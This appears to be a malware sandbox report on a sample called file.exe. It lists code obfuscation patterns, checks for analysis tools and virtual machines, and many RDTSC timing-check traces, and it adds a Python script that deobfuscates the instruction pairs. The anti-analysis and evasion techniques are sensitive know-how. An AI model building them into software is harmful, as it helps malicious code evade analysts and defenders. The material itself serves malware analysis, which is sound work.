Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013819A4 push ebx; mov dword ptr [esp], 3F9F6BB9h (at 0_2_01381A1C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013819A4 push 4DEEC901h; mov dword ptr [esp], edx (at 0_2_01381A29)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013819A4 push 55362D82h; mov dword ptr [esp], ecx (at 0_2_01381A31)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013819A4 push ecx; mov dword ptr [esp], eax (at 0_2_01381A3D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0143A1DC push 06B67C1Eh; mov dword ptr [esp], edi (at 0_2_0143A206)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126A986 push esi; mov dword ptr [esp], 3FAD7622h (at 0_2_0126A9E4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014969E9 push 222D7BBEh; mov dword ptr [esp], esi (at 0_2_01496A34)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014969E9 push ecx; mov dword ptr [esp], ebx (at 0_2_01496AB8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014431E2 push 1169E311h; mov dword ptr [esp], edx (at 0_2_014431F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01471981 push ebx; mov dword ptr [esp], edi (at 0_2_01471995)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01471981 push 62EAAA28h; mov dword ptr [esp], esi (at 0_2_01471A1E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FFB035 push ecx; ret (at 0_2_00FFB048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0145C98A push edx; mov dword ptr [esp], eax (at 0_2_0145C9CA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E91E9 push 02D31383h; mov dword ptr [esp], ebp (at 0_2_013E9942)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013DA9D3 push esi; mov dword ptr [esp], edi (at 0_2_013DA9B7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013DA9D3 push 6D3E0A73h; mov dword ptr [esp], eax (at 0_2_013DAA5B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01489077 push 0558A818h; mov dword ptr [esp], esi (at 0_2_01489690)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01440806 push ebp; mov dword ptr [esp], esi (at 0_2_0144082B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014A28C0 push 1BC7251Ch; mov dword ptr [esp], ecx (at 0_2_014A28DF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014A28C0 push ebp; mov dword ptr [esp], ecx (at 0_2_014A28F9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AA0A6 push eax; mov dword ptr [esp], ebx (at 0_2_013AA0EC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AA0A6 push 71F621B4h; mov dword ptr [esp], edi (at 0_2_013AA1D4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AA0A6 push eax; mov dword ptr [esp], ecx (at 0_2_013AA269)
Source: file.exe | Static PE information: section name: sixuqxru entropy: 7.952856690004543
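The push/mov pairs listed above are what the "Uses code obfuscation techniques (call, push, ret)" signature keys on. `push imm32; mov dword ptr [esp], reg` pushes a junk constant and then overwrites that very stack slot, so the pair is just `push reg` with one dead instruction in front of it, and `push reg; ret` is an indirect jump written so that no jmp shows up in the disassembly; both defeat naive pattern matching and inflate the listing without changing behaviour. The script below is an added example, not code from the report or from the sample: it normalizes a few of the sequences listed above and confirms each rewrite by executing the original and the normalized form over a small symbolic stack. The starting register values and the handful of modelled instructions are this example's own assumptions.

```python
import re

# Instruction pairs copied from the rows above: (function start, pattern, address of the pattern).
# These are the report's observations, not code taken from the sample.
OBSERVED_PAIRS = [
    ("0_2_0143E142", "push 72FD8CA7h; mov dword ptr [esp], eax", "0_2_0143E192"),
    ("0_2_01375900", "push ebx; mov dword ptr [esp], edi", "0_2_0137592A"),
    ("0_2_01375900", "push ebx; mov dword ptr [esp], 66807FE3h", "0_2_0137596E"),
    ("0_2_013819A4", "push 4DEEC901h; mov dword ptr [esp], edx", "0_2_01381A29"),
    ("0_2_00FFB035", "push ecx; ret", "0_2_00FFB048"),
]

PUSH_MOV_ESP = re.compile(r"push\s+(?P<dead>\S+)\s*;\s*mov dword ptr \[esp\],\s*(?P<live>\S+)")
PUSH_RET = re.compile(r"push\s+(?P<target>\S+)\s*;\s*ret")


def normalize(sequence: str) -> str:
    """Rewrite an obfuscated two-instruction sequence into its one-instruction equivalent."""
    seq = sequence.strip()
    m = PUSH_MOV_ESP.fullmatch(seq)
    if m:
        # The pushed value is overwritten in place by the next instruction, so it is dead:
        # 'push X; mov [esp], Y' behaves exactly like 'push Y'.
        return f"push {m.group('live')}"
    m = PUSH_RET.fullmatch(seq)
    if m:
        # 'ret' pops the just-pushed value into EIP: an indirect jump with no call/ret pairing.
        return f"jmp {m.group('target')}"
    return seq


def _operand(text: str, regs: dict) -> int:
    """Resolve a MASM-style operand: a 'DEADBEEFh' immediate or a register name."""
    text = text.strip()
    if re.fullmatch(r"[0-9A-Fa-f]+h", text):
        return int(text[:-1], 16)
    if text in regs:
        return regs[text]
    raise ValueError(f"unsupported operand {text!r}")


def simulate(sequence: str, regs: dict) -> tuple:
    """Run a ';'-separated push/pop/mov/ret/jmp sequence over a symbolic stack.

    Returns (stack, registers) after execution; a jump or return target lands in regs['eip'].
    Only the forms that occur in the report are modelled."""
    regs = dict(regs)
    stack: list = []
    for ins in (i.strip() for i in sequence.split(";") if i.strip()):
        op, _, args = ins.partition(" ")
        if op == "push":
            stack.append(_operand(args, regs))
        elif op == "pop":
            regs[args.strip()] = stack.pop()
        elif op == "mov":
            dst, src = (a.strip() for a in args.split(","))
            value = _operand(src, regs)
            if dst == "dword ptr [esp]":
                stack[-1] = value            # overwrite the top-of-stack slot in place
            else:
                regs[dst] = value
        elif op == "ret":
            regs["eip"] = stack.pop()
        elif op == "jmp":
            regs["eip"] = _operand(args, regs)
        else:
            raise ValueError(f"unsupported instruction {ins!r}")
    return stack, regs


# Arbitrary starting register values (assumption of the example).
DEFAULT_REGS = {"eax": 0x1111, "ebx": 0x2222, "ecx": 0x3333, "edx": 0x4444,
                "esi": 0x5555, "edi": 0x6666, "ebp": 0x7777}


def equivalent(sequence: str, regs: dict = None) -> bool:
    """True when the obfuscated sequence and its normalized form leave identical stack and registers."""
    regs = DEFAULT_REGS if regs is None else regs
    return simulate(sequence, regs) == simulate(normalize(sequence), regs)


if __name__ == "__main__":
    for func, pattern, addr in OBSERVED_PAIRS:
        print(f"{func} at {addr}: {pattern!r:46} -> {normalize(pattern)!r:18} equivalent={equivalent(pattern)}")
```

The same rewrite applied to a full listing is what turns the 316 calls to the string function at 00FE45C0 back into readable code; the simulation step is there because a peephole rule that is not stack-neutral would silently corrupt the deobfuscated output.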

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (listed twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (listed twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13659
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C467C | second address: 13C4682 | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C3C13 | second address: 13C3C1D | instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11F8D51842h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C3C1D | second address: 13C3C23 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C3DAF | second address: 13C3DBC | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F11F8D5183Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C3DBC | second address: 13C3DDF | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 je 00007F11F8F18C26h 0x0000000d pop eax 0x0000000e jmp 00007F11F8F18C31h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C58CA | second address: 13C58D4 | instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C58D4 | second address: 13C5929 | instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jg 00007F11F8F18C42h 0x00000011 jbe 00007F11F8F18C3Ch 0x00000017 jmp 00007F11F8F18C36h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F11F8F18C38h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5929 | second address: 13C5945 | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8D51848h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C59AF | second address: 13C59B3 | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C59B3 | second address: 13C59D6 | instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8D51849h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C59D6 | second address: 13C5A79 | instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F11F8F18C28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 call 00007F11F8F18C29h 0x0000002b push ecx 0x0000002c jmp 00007F11F8F18C2Dh 0x00000031 pop ecx 0x00000032 push eax 0x00000033 jmp 00007F11F8F18C36h 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d jmp 00007F11F8F18C2Ch 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 jl 00007F11F8F18C26h 0x0000004b popad 0x0000004c popad 0x0000004d mov eax, dword ptr [eax] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 jmp 00007F11F8F18C39h 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5A79 | second address: 13C5A9B | instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11F8D5183Ah 0x00000008 jmp 00007F11F8D5183Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5C53 | second address: 13C5C65 | instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F11F8F18C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5C65 | second address: 13C5C8B | instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F11F8D51836h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F11F8D51841h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5C8B | second address: 13C5CC0 | instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 je 00007F11F8F18C2Ch 0x00000016 jo 00007F11F8F18C26h 0x0000001c jmp 00007F11F8F18C2Dh 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 js 00007F11F8F18C26h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5CC0 | second address: 13C5CC4 | instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5CC4 second address: 13C5D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F11F8F18C2Ch 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F11F8F18C28h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f call 00007F11F8F18C36h 0x00000034 sub ecx, dword ptr [ebp+122D19C9h] 0x0000003a pop edx 0x0000003b lea ebx, dword ptr [ebp+124577D6h] 0x00000041 sbb cl, FFFFFF8Ah 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jo 00007F11F8F18C26h 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5D38 second address: 13C5D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E20 second address: 13C5E29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E29 second address: 13C5E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E34 second address: 13C5E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F11F8F18C37h 0x0000000b jmp 00007F11F8F18C2Fh 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F11F8F18C36h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E7F second address: 13C5E83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E83 second address: 13C5EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F11F8F18C28h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 jmp 00007F11F8F18C2Dh 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7D2D second address: 13D7D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E76A8 second address: 13E76AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5548 second address: 13E5550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5550 second address: 13E5555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5555 second address: 13E555A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5690 second address: 13E5694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5694 second address: 13E569A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E569A second address: 13E56B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F11F8F18C2Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F11F8F18C26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E59B4 second address: 13E59BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E59BA second address: 13E59BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E59BE second address: 13E59C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5AF2 second address: 13E5AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5C8E second address: 13E5C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5DE6 second address: 13E5DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5EFB second address: 13E5F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D51843h 0x00000009 pop ebx 0x0000000a jmp 00007F11F8D51845h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6325 second address: 13E632B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E65F1 second address: 13E65F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA3A2 second address: 13DA3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA3A8 second address: 13DA3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADD67 second address: 13ADD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADD6B second address: 13ADD75 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F11F8D5183Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D2B second address: 13E6D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C32h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F11F8F18C2Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D55 second address: 13E6D5F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D51836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D5F second address: 13E6D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F11F8F18C2Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D76 second address: 13E6D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F11F8D51836h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D51841h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6F27 second address: 13E6F8B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F11F8F18C32h 0x00000010 jne 00007F11F8F18C26h 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F11F8F18C36h 0x0000001d popad 0x0000001e jmp 00007F11F8F18C2Eh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jo 00007F11F8F18C26h 0x0000002d jmp 00007F11F8F18C2Ch 0x00000032 popad 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6F8B second address: 13E6F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6F92 second address: 13E6FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11F8F18C2Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E70E5 second address: 13E7101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F11F8D5183Ch 0x0000000b jbe 00007F11F8D51836h 0x00000011 pop esi 0x00000012 push ecx 0x00000013 pushad 0x00000014 jl 00007F11F8D51836h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7101 second address: 13E7107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB2BB second address: 13EB2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F11F8D51836h 0x0000000c jmp 00007F11F8D51841h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F11F8D51845h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB2F2 second address: 13EB2FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8DD2 second address: 13A8DD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDA9 second address: 13EEDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDBA second address: 13EEDC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDC0 second address: 13EEDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F11F8F18C33h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDD9 second address: 13EEDE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A4E second address: 13F3A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F11F8F18C26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A58 second address: 13F3A62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
